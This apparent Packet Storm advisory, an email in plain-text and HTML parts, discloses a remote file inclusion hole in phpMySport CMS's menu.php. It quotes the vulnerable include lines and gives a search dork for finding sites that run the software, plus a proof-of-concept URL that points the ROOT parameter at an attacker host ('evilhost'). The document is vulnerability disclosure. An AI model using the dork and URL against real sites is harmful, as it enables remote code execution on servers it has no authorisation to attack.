phpMySport CMS suffers from a remote file inclusion vulnerability in menu.php.
b6f8cde9f621ac52ba954b1f1c75e49d30c597e47e9d446a9ffebaf71c61ad1a------=_Part_13450_9048419.1173540747323
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Application : phpMySport CMS
URL : https://phpmysport.sourceforge.net/en/
Variable menu.php
include_once(ROOT."/team/sql_team.php");
include_once(ROOT."/team/tpl_team.php");
include_once(ROOT."/team/lg_team_".LANG.".php");
include(ROOT."/team/team_list.php");
Exploit:
~~~~~~~~
dork: "phpMySport"
https://www.vuln.com/path/menu.php?ROOT=https://evilhost
vitux
#vitux.manis@gmail.com
------=_Part_13450_9048419.1173540747323
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Application : phpMySport CMS<br><br>URL : <a href="https://phpmysport.sourceforge.net/en/">https://phpmysport.sourceforge.net/en/</a><br><br>Variable menu.php<br><br>include_once(ROOT."/team/sql_team.php");<br>include_once(ROOT."/team/tpl_team.php");
<br>include_once(ROOT."/team/lg_team_".LANG.".php");<br>include(ROOT."/team/team_list.php");<br><br> <br>Exploit:<br>~~~~~~~~<br><br>dork: "phpMySport"<br><br><a href="https://www.vuln.com/path/menu.php?ROOT=https://evilhost">
https://www.vuln.com/path/menu.php?ROOT=https://evilhost</a><br><br><br>vitux<br> <br>#vitux.manis@<a href="https://gmail.com">gmail.com</a>
------=_Part_13450_9048419.1173540747323--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed